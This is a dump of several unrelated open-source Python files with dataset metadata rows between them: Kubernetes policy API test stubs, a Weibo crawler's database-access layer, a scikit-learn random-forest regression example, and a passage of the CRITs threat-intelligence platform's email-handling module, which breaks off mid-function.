""" PolicyV1beta1Api unit test stubs """
def setUp(self):
self.api = kubernetes.client.apis.policy_v1beta1_api.PolicyV1beta1Api()
def tearDown(self):
pass
def test_create_namespaced_pod_disruption_budget(self):
"""
Test case for create_namespaced_pod_disruption_budget
"""
pass
def test_delete_collection_namespaced_pod_disruption_budget(self):
"""
Test case for delete_collection_namespaced_pod_disruption_budget
"""
pass
def test_delete_namespaced_pod_disruption_budget(self):
"""
Test case for delete_namespaced_pod_disruption_budget
"""
pass
def test_get_api_resources(self):
"""
Test case for get_api_resources
"""
pass
def test_list_namespaced_pod_disruption_budget(self):
"""
Test case for list_namespaced_pod_disruption_budget
"""
pass
def test_list_pod_disruption_budget_for_all_namespaces(self):
"""
Test case for list_pod_disruption_budget_for_all_namespaces
"""
pass
def test_patch_namespaced_pod_disruption_budget(self):
"""
Test case for patch_namespaced_pod_disruption_budget
"""
pass
def test_patch_namespaced_pod_disruption_budget_status(self):
"""
Test case for patch_namespaced_pod_disruption_budget_status
"""
pass
def test_read_namespaced_pod_disruption_budget(self):
"""
Test case for read_namespaced_pod_disruption_budget
"""
pass
def test_read_namespaced_pod_disruption_budget_status(self):
"""
Test case for read_namespaced_pod_disruption_budget_status
"""
pass
def test_replace_namespaced_pod_disruption_budget(self):
"""
Test case for replace_namespaced_pod_disruption_budget
"""
pass
def test_replace_namespaced_pod_disruption_budget_status(self):
"""
Test case for replace_namespaced_pod_disruption_budget_status
"""
pass
if __name__ == '__main__':
unittest.main()
| apache-2.0 | -6,518,013,391,887,288,000 | 20.378788 | 105 | 0.606308 | false |
ResolveWang/WeiboSpider | db/dao.py | 1 | 7194 | from sqlalchemy import text
from sqlalchemy.exc import IntegrityError as SqlalchemyIntegrityError
from pymysql.err import IntegrityError as PymysqlIntegrityError
from sqlalchemy.exc import InvalidRequestError
from .basic import db_session
from .models import (
LoginInfo, KeywordsWbdata, KeyWords, SeedIds, UserRelation,
WeiboComment, WeiboRepost, User, WeiboData, WeiboPraise
)
from decorators import db_commit_decorator
class CommonOper:
@classmethod
@db_commit_decorator
def add_one(cls, data):
db_session.add(data)
db_session.commit()
@classmethod
@db_commit_decorator
def add_all(cls, datas):
try:
db_session.add_all(datas)
db_session.commit()
except (SqlalchemyIntegrityError, PymysqlIntegrityError, InvalidRequestError):
for data in datas:
cls.add_one(data)
class LoginInfoOper:
@classmethod
def get_login_info(cls):
return db_session.query(LoginInfo.name, LoginInfo.password, LoginInfo.enable). \
filter(text('enable=1')).all()
@classmethod
@db_commit_decorator
def freeze_account(cls, name, rs):
"""
:param name: login account
:param rs: 0 stands for banned,1 stands for normal,2 stands for name or password is invalid
:return:
"""
account = db_session.query(LoginInfo).filter(LoginInfo.name == name).first()
account.enable = rs
db_session.commit()
class KeywordsDataOper:
@classmethod
@db_commit_decorator
def insert_keyword_wbid(cls, keyword_id, wbid):
keyword_wbdata = KeywordsWbdata()
keyword_wbdata.wb_id = wbid
keyword_wbdata.keyword_id = keyword_id
db_session.add(keyword_wbdata)
db_session.commit()
class KeywordsOper:
@classmethod
def get_search_keywords(cls):
return db_session.query(KeyWords.keyword, KeyWords.id).filter(text('enable=1')).all()
@classmethod
@db_commit_decorator
def set_useless_keyword(cls, keyword):
search_word = db_session.query(KeyWords).filter(KeyWords.keyword == keyword).first()
search_word.enable = 0
db_session.commit()
class SeedidsOper:
@classmethod
def get_seed_ids(cls):
"""
Get all user id to be crawled
:return: user ids
"""
return db_session.query(SeedIds.uid).filter(text('is_crawled=0')).all()
@classmethod
def get_home_ids(cls):
"""
Get all user id who's home pages need to be crawled
:return: user ids
"""
return db_session.query(SeedIds.uid).filter(text('home_crawled=0')).all()
@classmethod
@db_commit_decorator
def set_seed_crawled(cls, uid, result):
"""
:param uid: user id that is crawled
:param result: crawling result, 1 stands for succeed, 2 stands for fail
:return: None
"""
seed = db_session.query(SeedIds).filter(SeedIds.uid == uid).first()
if seed and seed.is_crawled == 0:
seed.is_crawled = result
else:
seed = SeedIds(uid=uid, is_crawled=result)
db_session.add(seed)
db_session.commit()
@classmethod
def get_seed_by_id(cls, uid):
return db_session.query(SeedIds).filter(SeedIds.uid == uid).first()
@classmethod
@db_commit_decorator
def insert_seeds(cls, ids):
db_session.execute(SeedIds.__table__.insert().prefix_with('IGNORE'), [{'uid': i} for i in ids])
db_session.commit()
@classmethod
@db_commit_decorator
def set_seed_other_crawled(cls, uid):
"""
update it if user id already exists, else insert
:param uid: user id
:return: None
"""
seed = cls.get_seed_by_id(uid)
if seed is None:
seed = SeedIds(uid=uid, is_crawled=1, other_crawled=1, home_crawled=1)
db_session.add(seed)
else:
seed.other_crawled = 1
db_session.commit()
@classmethod
@db_commit_decorator
def set_seed_home_crawled(cls, uid):
"""
:param uid: user id
:return: None
"""
seed = cls.get_seed_by_id(uid)
if seed is None:
seed = SeedIds(uid=uid, is_crawled=0, other_crawled=0, home_crawled=1)
db_session.add(seed)
else:
seed.home_crawled = 1
db_session.commit()
class UserOper(CommonOper):
@classmethod
def get_user_by_uid(cls, uid):
return db_session.query(User).filter(User.uid == uid).first()
@classmethod
def get_user_by_name(cls,user_name):
return db_session.query(User).filter(User.name == user_name).first()
class UserRelationOper(CommonOper):
@classmethod
def get_user_by_uid(cls, uid, other_id, type):
user = db_session.query(UserRelation).filter_by(user_id = uid, follow_or_fans_id = other_id).first()
if user:
return True
else:
return False
class WbDataOper(CommonOper):
@classmethod
def get_wb_by_mid(cls, mid):
return db_session.query(WeiboData).filter(WeiboData.weibo_id == mid).first()
@classmethod
def get_weibo_comment_not_crawled(cls):
return db_session.query(WeiboData.weibo_id).filter(text('comment_crawled=0')).all()
@classmethod
def get_weibo_praise_not_crawled(cls):
return db_session.query(WeiboData.weibo_id).filter(text('praise_crawled=0')).all()
@classmethod
def get_weibo_repost_not_crawled(cls):
return db_session.query(WeiboData.weibo_id, WeiboData.uid).filter(text('repost_crawled=0')).all()
@classmethod
def get_weibo_dialogue_not_crawled(cls):
return db_session.query(WeiboData.weibo_id).filter(text('dialogue_crawled=0')).all()
@classmethod
@db_commit_decorator
def set_weibo_comment_crawled(cls, mid):
data = cls.get_wb_by_mid(mid)
if data:
data.comment_crawled = 1
db_session.commit()
@classmethod
@db_commit_decorator
def set_weibo_praise_crawled(cls, mid):
data = cls.get_wb_by_mid(mid)
if data:
data.praise_crawled = 1
db_session.commit()
@classmethod
@db_commit_decorator
def set_weibo_repost_crawled(cls, mid):
data = cls.get_wb_by_mid(mid)
if data:
data.repost_crawled = 1
db_session.commit()
@classmethod
@db_commit_decorator
def set_weibo_dialogue_crawled(cls, mid):
data = cls.get_wb_by_mid(mid)
if data:
data.dialogue_crawled = 1
db_session.commit()
class CommentOper(CommonOper):
@classmethod
def get_comment_by_id(cls, cid):
return db_session.query(WeiboComment).filter(WeiboComment.comment_id == cid).first()
class PraiseOper(CommonOper):
@classmethod
def get_Praise_by_id(cls, pid):
return db_session.query(WeiboPraise).filter(WeiboPraise.weibo_id == pid).first()
class RepostOper(CommonOper):
@classmethod
def get_repost_by_rid(cls, rid):
return db_session.query(WeiboRepost).filter(WeiboRepost.weibo_id == rid).first()
| mit | 6,026,674,423,055,466,000 | 29.210084 | 108 | 0.624478 | false |
karstenw/nodebox-pyobjc | examples/Extended Application/sklearn/examples/ensemble/plot_random_forest_regression_multioutput.py | 1 | 3492 | """
============================================================
Comparing random forests and the multi-output meta estimator
============================================================
An example to compare multi-output regression with random forest and
the :ref:`multioutput.MultiOutputRegressor <multiclass>` meta-estimator.
This example illustrates the use of the
:ref:`multioutput.MultiOutputRegressor <multiclass>` meta-estimator
to perform multi-output regression. A random forest regressor is used,
which supports multi-output regression natively, so the results can be
compared.
The random forest regressor will only ever predict values within the
range of observations or closer to zero for each of the targets. As a
result the predictions are biased towards the centre of the circle.
Using a single underlying feature the model learns both the
x and y coordinate as output.
"""
print(__doc__)
# Author: Tim Head <[email protected]>
#
# License: BSD 3 clause
import numpy as np
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import train_test_split
from sklearn.multioutput import MultiOutputRegressor
# nodebox section
if __name__ == '__builtin__':
# were in nodebox
import os
import tempfile
W = 800
inset = 20
size(W, 600)
plt.cla()
plt.clf()
plt.close('all')
def tempimage():
fob = tempfile.NamedTemporaryFile(mode='w+b', suffix='.png', delete=False)
fname = fob.name
fob.close()
return fname
imgx = 20
imgy = 0
def pltshow(plt, dpi=150):
global imgx, imgy
temppath = tempimage()
plt.savefig(temppath, dpi=dpi)
dx,dy = imagesize(temppath)
w = min(W,dx)
image(temppath,imgx,imgy,width=w)
imgy = imgy + dy + 20
os.remove(temppath)
size(W, HEIGHT+dy+40)
else:
def pltshow(mplpyplot):
mplpyplot.show()
# nodebox section end
# Create a random dataset
rng = np.random.RandomState(1)
X = np.sort(200 * rng.rand(600, 1) - 100, axis=0)
y = np.array([np.pi * np.sin(X).ravel(), np.pi * np.cos(X).ravel()]).T
y += (0.5 - rng.rand(*y.shape))
X_train, X_test, y_train, y_test = train_test_split(X, y,
train_size=400,
random_state=4)
max_depth = 30
regr_multirf = MultiOutputRegressor(RandomForestRegressor(max_depth=max_depth,
random_state=0))
regr_multirf.fit(X_train, y_train)
regr_rf = RandomForestRegressor(max_depth=max_depth, random_state=2)
regr_rf.fit(X_train, y_train)
# Predict on new data
y_multirf = regr_multirf.predict(X_test)
y_rf = regr_rf.predict(X_test)
# Plot the results
plt.figure()
s = 50
a = 0.4
plt.scatter(y_test[:, 0], y_test[:, 1], edgecolor='k',
c="navy", s=s, marker="s", alpha=a, label="Data")
plt.scatter(y_multirf[:, 0], y_multirf[:, 1], edgecolor='k',
c="cornflowerblue", s=s, alpha=a,
label="Multi RF score=%.2f" % regr_multirf.score(X_test, y_test))
plt.scatter(y_rf[:, 0], y_rf[:, 1], edgecolor='k',
c="c", s=s, marker="^", alpha=a,
label="RF score=%.2f" % regr_rf.score(X_test, y_test))
plt.xlim([-6, 6])
plt.ylim([-6, 6])
plt.xlabel("target 1")
plt.ylabel("target 2")
plt.title("Comparing random forests and the multi-output meta estimator")
plt.legend()
# plt.show()
pltshow(plt)
| mit | -3,734,786,197,194,947,600 | 30.459459 | 82 | 0.61827 | false |
korrosivesec/crits | crits/emails/handlers.py | 1 | 65619 | from __future__ import absolute_import
import datetime
import email as eml
from email.parser import Parser
from email.utils import parseaddr, getaddresses, mktime_tz, parsedate_tz
import hashlib
import json
import magic
import re
import yaml
import io
import sys
import olefile
from dateutil.parser import parse as date_parser
from django.conf import settings
from crits.core.forms import DownloadFileForm
from crits.emails.forms import EmailYAMLForm
from django.core.urlresolvers import reverse
from django.http import HttpResponse
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.template.loader import render_to_string
from crits.campaigns.forms import CampaignForm
from crits.config.config import CRITsConfig
from crits.core.crits_mongoengine import json_handler, create_embedded_source
from crits.core.crits_mongoengine import EmbeddedCampaign
from crits.core.data_tools import clean_dict
from crits.core.exceptions import ZipFileError
from crits.core.handlers import class_from_id
from crits.core.handlers import build_jtable, jtable_ajax_list, jtable_ajax_delete
from crits.core.handlers import csv_export
from crits.core.user_tools import user_sources, is_admin, is_user_favorite
from crits.core.user_tools import is_user_subscribed
from crits.domains.handlers import get_valid_root_domain
from crits.emails.email import Email
from crits.indicators.handlers import handle_indicator_ind
from crits.indicators.indicator import Indicator
from crits.notifications.handlers import remove_user_from_notification
from crits.samples.handlers import handle_file, handle_uploaded_file, mail_sample
from crits.services.handlers import run_triage
from crits.vocabulary.relationships import RelationshipTypes
from crits.vocabulary.indicators import (
IndicatorTypes,
IndicatorAttackTypes,
IndicatorThreatTypes
)
def create_email_field_dict(field_name,
field_type,
field_value,
field_displayed_text,
is_allow_create_indicator,
is_href,
is_editable,
is_email_list,
is_splunk,
href_search_field=None):
"""
Generates a 1:1 dictionary from all of the input fields.
Returns:
A dictionary of all the input fields, with the input parameter names
each as a key and its associated value as the value pair.
"""
return {"field_name": field_name,
"field_type": field_type,
"field_value": field_value,
"field_displayed_text": field_displayed_text,
"is_allow_create_indicator": is_allow_create_indicator,
"is_href": is_href,
"is_editable": is_editable,
"is_email_list": is_email_list,
"is_splunk": is_splunk,
"href_search_field": href_search_field
}
def generate_email_csv(request):
"""
Generate a CSV file of the Email information
:param request: The request for this CSV.
:type request: :class:`django.http.HttpRequest`
:returns: :class:`django.http.HttpResponse`
"""
response = csv_export(request, Email)
return response
def get_email_formatted(email_id, analyst, data_format):
"""
Format an email in YAML or JSON.
:param email_id: The ObjectId of the email.
:type email_id: str
:param analyst: The user requesting the data.
:type analyst: str
:param data_format: The format you want the data in.
:type data_format: "json" or "yaml"
:returns: :class:`django.http.HttpResponse`
"""
sources = user_sources(analyst)
email = Email.objects(id=email_id, source__name__in=sources).first()
if not email:
return HttpResponse(json.dumps({}), content_type="application/json")
exclude = [
"created",
"source",
"relationships",
"schema_version",
"campaign",
"analysis",
"bucket_list",
"ticket",
"releasability",
"unsupported_attrs",
"status",
"objects",
"modified",
"analyst",
"_id",
"to",
"cc",
"raw_headers",
]
if data_format == "yaml":
data = {"email_yaml": email.to_yaml(exclude=exclude)}
elif data_format == "json":
data = {"email_yaml": email.to_json(exclude=exclude)}
else:
data = {"email_yaml": {}}
return HttpResponse(json.dumps(data), content_type="application/json")
def get_email_detail(email_id, analyst):
"""
Generate the email details page.
:param email_id: The ObjectId of the email.
:type email_id: str
:param analyst: The user requesting the data.
:type analyst: str
:returns: tuple
"""
template = None
sources = user_sources(analyst)
email = Email.objects(id=email_id, source__name__in=sources).first()
if not email:
template = "error.html"
args = {'error': "ID does not exist or insufficient privs for source"}
else:
email.sanitize(username="%s" % analyst, sources=sources)
update_data_form = EmailYAMLForm(analyst)
campaign_form = CampaignForm()
download_form = DownloadFileForm(initial={"obj_type": 'Email',
"obj_id":email_id})
# remove pending notifications for user
remove_user_from_notification("%s" % analyst, email.id, 'Email')
# subscription
subscription = {
'type': 'Email',
'id': email.id,
'subscribed': is_user_subscribed("%s" % analyst, 'Email',
email.id),
}
# objects
objects = email.sort_objects()
# relationships
relationships = email.sort_relationships("%s" % analyst, meta=True)
# relationship
relationship = {
'type': 'Email',
'value': email.id
}
# comments
comments = {'comments': email.get_comments(),
'url_key': email.id}
#screenshots
screenshots = email.get_screenshots(analyst)
# favorites
favorite = is_user_favorite("%s" % analyst, 'Email', email.id)
email_fields = []
email_fields.append(create_email_field_dict(
"from_address", # field_name
IndicatorTypes.EMAIL_FROM, # field_type
email.from_address, # field_value
"From", # field_displayed_text
# is_allow_create_indicator
# is_href
# is_editable
# is_email_list
# is_splunk
True, True, True, False, True,
href_search_field="from" # href_search_field
))
email_fields.append(create_email_field_dict(
"sender",
IndicatorTypes.EMAIL_SENDER,
email.sender,
"Sender",
True, True, True, False, True,
href_search_field="sender"
))
email_fields.append(create_email_field_dict(
"Email To",
None,
email.to,
"To",
False, True, True, True, False,
href_search_field=None
))
email_fields.append(create_email_field_dict(
"cc",
"Email CC",
email.cc,
"CC",
False, True, True, True, False,
href_search_field=None
))
email_fields.append(create_email_field_dict(
"date",
"Email Date",
email.date,
"Date",
False, False, True, False, False,
href_search_field=None
))
email_fields.append(create_email_field_dict(
"isodate",
"Email ISODate",
email.isodate,
"ISODate",
False, False, False, False, False,
href_search_field=None
))
email_fields.append(create_email_field_dict(
"subject",
IndicatorTypes.EMAIL_SUBJECT,
email.subject,
"Subject",
True, True, True, False, False,
href_search_field="subject"
))
email_fields.append(create_email_field_dict(
"x_mailer",
IndicatorTypes.EMAIL_X_MAILER,
email.x_mailer,
"X-Mailer",
True, True, True, False, False,
href_search_field="x_mailer"
))
email_fields.append(create_email_field_dict(
"reply_to",
IndicatorTypes.EMAIL_REPLY_TO,
email.reply_to,
"Reply To",
True, True, True, False, False,
href_search_field="reply_to"
))
email_fields.append(create_email_field_dict(
"message_id",
IndicatorTypes.EMAIL_MESSAGE_ID,
email.message_id,
"Message ID",
True, False, True, False, False,
href_search_field=None
))
email_fields.append(create_email_field_dict(
"helo",
IndicatorTypes.EMAIL_HELO,
email.helo,
"helo",
True, True, True, False, False,
href_search_field="helo"
))
email_fields.append(create_email_field_dict(
"boundary",
IndicatorTypes.EMAIL_BOUNDARY,
email.boundary,
"Boundary",
True, False, True, False, False,
href_search_field=None
))
email_fields.append(create_email_field_dict(
"originating_ip",
IndicatorTypes.EMAIL_ORIGINATING_IP,
email.originating_ip,
"Originating IP",
True, True, True, False, True,
href_search_field="originating_ip"
))
email_fields.append(create_email_field_dict(
"x_originating_ip",
IndicatorTypes.EMAIL_X_ORIGINATING_IP,
email.x_originating_ip,
"X-Originating IP",
True, True, True, False, True,
href_search_field="x_originating_ip"
))
# analysis results
service_results = email.get_analysis_results()
args = {'objects': objects,
'email_fields': email_fields,
'relationships': relationships,
'comments': comments,
'favorite': favorite,
'relationship': relationship,
'screenshots': screenshots,
'subscription': subscription,
'email': email,
'campaign_form': campaign_form,
'download_form': download_form,
'update_data_form': update_data_form,
'admin': is_admin(analyst),
'service_results': service_results,
'rt_url': settings.RT_URL}
return template, args
def generate_email_jtable(request, option):
"""
Generate email jtable.
:param request: The request for this jtable.
:type request: :class:`django.http.HttpRequest`
:param option: Action to take.
:type option: str of either 'jtlist', 'jtdelete', or 'inline'.
:returns: :class:`django.http.HttpResponse`
"""
obj_type = Email
type_ = "email"
mapper = obj_type._meta['jtable_opts']
if option == "jtlist":
# Sets display url
details_url = mapper['details_url']
details_url_key = mapper['details_url_key']
fields = mapper['fields']
response = jtable_ajax_list(obj_type,
details_url,
details_url_key,
request,
includes=fields)
if 'Records' in response:
for doc in response['Records']:
if doc['to']:
doc['recip'] = len(doc['to'].split(','))
else:
doc['recip'] = 0
if doc['cc']:
doc['recip'] += len(doc['cc'].split(','))
return HttpResponse(json.dumps(response, default=json_handler),
content_type="application/json")
if option == "jtdelete":
response = {"Result": "ERROR"}
if jtable_ajax_delete(obj_type, request):
response = {"Result": "OK"}
return HttpResponse(json.dumps(response,
default=json_handler),
content_type="application/json")
jtopts = {
'title': "Emails",
'default_sort': mapper['default_sort'],
'listurl': reverse('crits.%ss.views.%ss_listing' % (type_,
type_), args=('jtlist',)),
'deleteurl': reverse('crits.%ss.views.%ss_listing' % (type_,
type_), args=('jtdelete',)),
'searchurl': reverse(mapper['searchurl']),
'fields': mapper['jtopts_fields'],
'hidden_fields': mapper['hidden_fields'],
'linked_fields': mapper['linked_fields'],
'details_link': mapper['details_link'],
'no_sort': mapper['no_sort']
}
jtable = build_jtable(jtopts, request)
jtable['toolbar'] = [
{
'tooltip': "'All Emails'",
'text': "'All'",
'click': "function () {$('#email_listing').jtable('load', {'refresh': 'yes'});}",
'cssClass': "'jtable-toolbar-center'",
},
{
'tooltip': "'New Emails'",
'text': "'New'",
'click': "function () {$('#email_listing').jtable('load', {'refresh': 'yes', 'status': 'New'});}",
'cssClass': "'jtable-toolbar-center'",
},
{
'tooltip': "'In Progress Emails'",
'text': "'In Progress'",
'click': "function () {$('#email_listing').jtable('load', {'refresh': 'yes', 'status': 'In Progress'});}",
'cssClass': "'jtable-toolbar-center'",
},
{
'tooltip': "'Analyzed Emails'",
'text': "'Analyzed'",
'click': "function () {$('#email_listing').jtable('load', {'refresh': 'yes', 'status': 'Analyzed'});}",
'cssClass': "'jtable-toolbar-center'",
},
{
'tooltip': "'Deprecated Emails'",
'text': "'Deprecated'",
'click': "function () {$('#email_listing').jtable('load', {'refresh': 'yes', 'status': 'Deprecated'});}",
'cssClass': "'jtable-toolbar-center'",
},
{
'tooltip': "'Add Email'",
'text': "'Add Email'",
'click': "function () {$('#new-email-fields').click()}",
},
{
'tooltip': "'Upload Outlook Email'",
'text': "'Upload .msg'",
'click': "function () {$('#new-email-outlook').click()}",
},
]
if option == "inline":
return render_to_response("jtable.html",
{'jtable': jtable,
'jtid': '%s_listing' % type_,
'button' : '%ss_tab' % type_},
RequestContext(request))
else:
return render_to_response("%s_listing.html" % type_,
{'jtable': jtable,
'jtid': '%s_listing' % type_},
RequestContext(request))
def handle_email_fields(data, analyst, method):
"""
Take email fields and convert them into an email object.
:param data: The fields to include in the email.
:type data: dict
:param analyst: The user creating this email object.
:type analyst: str
:param method: The method of acquiring this email.
:type method: str
:returns: dict with keys:
"status" (boolean),
"object" The email object if successful,
"reason" (str).
"""
result = {
'status': False,
'reason': "",
'object': None,
'data': None
}
# Date and source are the only required ones.
# If there is no campaign confidence, default it to low.
# Remove these items from data so they are not added when merged.
sourcename = data.get('source', None)
del data['source']
if data.get('source_method', None):
method = method + " - " + data.get('source_method', None)
try:
del data['source_method']
except:
pass
reference = data.get('source_reference', None)
try:
del data['source_reference']
except:
pass
bucket_list = data.get('bucket_list', None)
try:
del data['bucket_list']
except:
pass
ticket = data.get('ticket', None)
try:
del data['ticket']
except:
pass
campaign = data.get('campaign', None)
try:
del data['campaign']
except:
pass
confidence = data.get('campaign_confidence', 'low')
try:
del data['campaign_confidence']
except:
pass
try:
for x in ('cc', 'to'):
y = data.get(x, None)
if isinstance(y, basestring):
if len(y) > 0:
tmp_y = y.split(',')
y_final = [ty.strip() for ty in tmp_y if len(ty.strip()) > 0]
data[x] = y_final
else:
data[x] = []
elif not y:
data[x] = []
except:
pass
new_email = Email()
new_email.merge(data)
if bucket_list:
new_email.add_bucket_list(bucket_list, analyst)
if ticket:
new_email.add_ticket(ticket, analyst)
new_email.source = [create_embedded_source(sourcename,
reference=reference,
method=method,
analyst=analyst)]
if campaign:
ec = EmbeddedCampaign(name=campaign,
confidence=confidence,
description="",
analyst=analyst,
date=datetime.datetime.now())
new_email.add_campaign(ec)
try:
new_email.save(username=analyst)
new_email.reload()
run_triage(new_email, analyst)
result['object'] = new_email
result['status'] = True
except Exception, e:
result['reason'] = "Failed to save object.\n<br /><pre>%s</pre>" % str(e)
return result
def handle_json(data, sourcename, reference, analyst, method,
save_unsupported=True, campaign=None, confidence=None,
bucket_list=None, ticket=None):
"""
Take email in JSON and convert them into an email object.
:param data: The data for the email.
:type data: dict
:param sourcename: The name of the source providing this email.
:type sourcename: str
:param reference: The reference to the data from the source.
:type reference: str
:param analyst: The user creating this email object.
:type analyst: str
:param method: The method of acquiring this email.
:type method: str
:param save_unsupported: Save any unsupported fields instead of ignoring.
:type save_unsupported: boolean
:param campaign: The campaign to attribute to this email.
:type campaign: str
:param confidence: Confidence level of the campaign.
:type confidence: str
:param bucket_list: The bucket(s) to assign to this data.
:type bucket_list: str
:param ticket: The ticket to assign to this data.
:type ticket: str
:returns: dict with keys:
"status" (boolean),
"object" The email object if successful,
"data" the converted email data.
"reason" (str).
"""
result = {
'status': False,
'reason': "",
'object': None,
'data': None
}
try:
converted = json.loads(data)
if isinstance(converted, dict) == False:
raise
except Exception, e:
result["reason"] = "Cannot convert data to JSON.\n<br /><pre>%s</pre>" % str(e)
return result
result['data'] = converted
new_email = dict_to_email(result['data'], save_unsupported=save_unsupported)
if bucket_list:
new_email.add_bucket_list(bucket_list, analyst)
if ticket:
new_email.add_ticket(ticket, analyst)
if campaign:
if not confidence:
confidence = "low"
ec = EmbeddedCampaign(name=campaign,
confidence=confidence,
description="",
analyst=analyst,
date=datetime.datetime.now())
new_email.add_campaign(ec)
result['object'] = new_email
result['object'].source = [create_embedded_source(sourcename,
reference=reference,
method=method,
analyst=analyst)]
try:
result['object'].save(username=analyst)
result['object'].reload()
run_triage(result['object'], analyst)
except Exception, e:
result['reason'] = "Failed to save object.\n<br /><pre>%s</pre>" % str(e)
result['status'] = True
return result
# if email_id is provided it is the existing email id to modify.
def handle_yaml(data, sourcename, reference, analyst, method, email_id=None,
save_unsupported=True, campaign=None, confidence=None,
bucket_list=None, ticket=None):
"""
Take email in YAML and convert them into an email object.
:param data: The data for the email.
:type data: dict
:param sourcename: The name of the source providing this email.
:type sourcename: str
:param reference: The reference to the data from the source.
:type reference: str
:param analyst: The user creating this email object.
:type analyst: str
:param method: The method of acquiring this email.
:type method: str
:param email_id: The ObjectId of the existing email to update.
:type email_id: str
:param save_unsupported: Save any unsupported fields instead of ignoring.
:type save_unsupported: boolean
:param campaign: The campaign to attribute to this email.
:type campaign: str
:param confidence: Confidence level of the campaign.
:type confidence: str
:param bucket_list: The bucket(s) to assign to this data.
:type bucket_list: str
:param ticket: The ticket to assign to this data.
:type ticket: str
:returns: dict with keys:
"status" (boolean),
"object" The email object if successful,
"data" the converted email data.
"reason" (str).
"""
result = {
'status': False,
'reason': "",
'object': None,
'data': None
}
try:
converted = yaml.load(data)
if isinstance(converted, dict) == False:
raise
except Exception, e:
result["reason"] = "Cannot convert data to YAML.\n<br /><pre>%s</pre>" % str(e)
return result
result['data'] = converted
new_email = dict_to_email(result['data'], save_unsupported=save_unsupported)
if bucket_list:
new_email.add_bucket_list(bucket_list, analyst)
if ticket:
new_email.add_ticket(ticket, analyst)
if campaign:
if not confidence:
confidence = "low"
ec = EmbeddedCampaign(name=campaign,
confidence=confidence,
description="",
analyst=analyst,
date=datetime.datetime.now())
new_email.add_campaign(ec)
result['object'] = new_email
if email_id:
old_email = class_from_id('Email', email_id)
if not old_email:
result['reason'] = "Unknown email_id."
return result
# Can not merge with a source?
# For now, just save the original source and put it back after merge.
saved_source = old_email.source
# XXX: If you use the "Edit YAML" button and edit the "from" field
# it gets put into the new email object in dict_to_email() correctly
# but calling to_dict() on that object results in a 'from' key being
# put into the dictionary. Thus, the following line will result in
# your new 'from' field being stuffed into unsupported_attrs.
# old_email.merge(result['object'].to_dict(), True)
# To work around this (for now) convert the new email object to a
# dictionary and manually replace 'from' with the from_address
# property.
tmp = result['object'].to_dict()
if 'from' in tmp:
tmp['from_address'] = result['object'].from_address
old_email.merge(tmp, True)
old_email.source = saved_source
try:
old_email.save(username=analyst)
except Exception, e:
result['reason'] = "Failed to save object.\n<br /><pre>%s</pre>" % str(e)
return result
else:
result['object'].source = [create_embedded_source(sourcename,
reference=reference,
method=method,
analyst=analyst)]
try:
result['object'].save(username=analyst)
result['object'].reload()
run_triage(result['object'], analyst)
except Exception, e:
result['reason'] = "Failed to save object.\n<br /><pre>%s</pre>" % str(e)
return result
result['status'] = True
return result
def handle_msg(data, sourcename, reference, analyst, method, password='',
campaign=None, confidence=None, bucket_list=None, ticket=None):
"""
Take email in MSG and convert them into an email object.
:param data: The data for the email.
:type data: dict
:param sourcename: The name of the source providing this email.
:type sourcename: str
:param reference: The reference to the data from the source.
:type reference: str
:param analyst: The user creating this email object.
:type analyst: str
:param method: The method of acquiring this email.
:type method: str
:param password: The password for the attachment.
:type password: str
:param campaign: The campaign to attribute to this email.
:type campaign: str
:param confidence: Confidence level of the campaign.
:type confidence: str
:param bucket_list: The bucket(s) to assign to this data.
:type bucket_list: str
:param ticket: The ticket to assign to this data.
:type ticket: str
:returns: dict with keys:
"status" (boolean),
"obj_id" The email ObjectId if successful,
"message" (str)
"reason" (str).
"""
response = {'status': False}
result = parse_ole_file(data)
if result.has_key('error'):
response['reason'] = result['error']
return response
result['email']['source'] = sourcename
result['email']['source_reference'] = reference
result['email']['campaign'] = campaign
result['email']['campaign_confidence'] = confidence
result['email']['bucket_list'] = bucket_list
result['email']['ticket'] = ticket
if result['email'].has_key('date'):
result['email']['isodate'] = date_parser(result['email']['date'],
fuzzy=True)
obj = handle_email_fields(result['email'], analyst, method)
if not obj["status"]:
response['reason'] = obj['reason']
return response
email = obj.get('object')
# Process attachments and upload as samples
attach_messages = []
for file in result['attachments']:
type_ = file.get('type', '')
if 'pkcs7' not in type_:
mimetype = magic.from_buffer(file.get('data', ''), mime=True)
if mimetype is None:
file_format = 'raw'
elif 'application/zip' in mimetype:
file_format = 'zip'
elif 'application/x-rar' in mimetype:
file_format = 'rar'
else:
file_format = 'raw'
try:
cleaned_data = {'file_format': file_format,
'password': password}
r = create_email_attachment(email, cleaned_data, analyst, sourcename,
method, reference, campaign, confidence,
"", "", file.get('data', ''), file.get('name', ''))
if 'success' in r:
if not r['success']:
attach_messages.append("%s: %s" % (file.get('name', ''),
r['message']))
else:
attach_messages.append("%s: Added Successfully!" % file.get('name', ''))
except BaseException:
error_message = 'The email uploaded successfully, but there was an error\
uploading the attachment ' + file['name'] + '\n\n' + str(sys.exc_info())
response['reason'] = error_message
return response
else:
attach_messages.append('%s: Cannot decrypt attachment (pkcs7).' % file.get('name', ''))
if len(attach_messages):
response['message'] = '<br/>'.join(attach_messages)
response['status'] = True
response['obj_id'] = obj['object'].id
return response
def handle_pasted_eml(data, sourcename, reference, analyst, method,
parent_type=None, parent_id=None, campaign=None,
confidence=None, bucket_list=None, ticket=None):
"""
Take email in EML and convert them into an email object.
:param data: The data for the email.
:type data: dict
:param sourcename: The name of the source providing this email.
:type sourcename: str
:param reference: The reference to the data from the source.
:type reference: str
:param analyst: The user creating this email object.
:type analyst: str
:param method: The method of acquiring this email.
:type method: str
:param parent_type: The top-level object type of the parent.
:type parent_type: str
:param parent_id: The ObjectId of the parent.
:type parent_id: str
:param campaign: The campaign to attribute to this email.
:type campaign: str
:param confidence: Confidence level of the campaign.
:type confidence: str
:param bucket_list: The bucket(s) to assign to this data.
:type bucket_list: str
:param ticket: The ticket to assign to this data.
:type ticket: str
:returns: dict with keys:
"status" (boolean),
"reason" (str),
"object" The email object if successful,
"data" the converted email data,
"attachments" (dict).
"""
# Try to fix headers where we lost whitespace indents
# Split by newline, parse/fix headers, join by newline
hfieldre = re.compile('^\S+:\s')
boundaryre = re.compile('boundary="?([^\s"\']+)"?')
emldata = []
boundary = None
isbody = False
if not isinstance(data, str):
data = data.read()
for line in data.split("\n"):
# We match the regex for a boundary definition
m = boundaryre.search(line)
if m:
boundary = m.group(1)
# content boundary exists and we reached it
if boundary and boundary in line:
isbody = True
# If we are not in the body and see somethign that does not look
# like a valid header field, prepend a space to attach this line
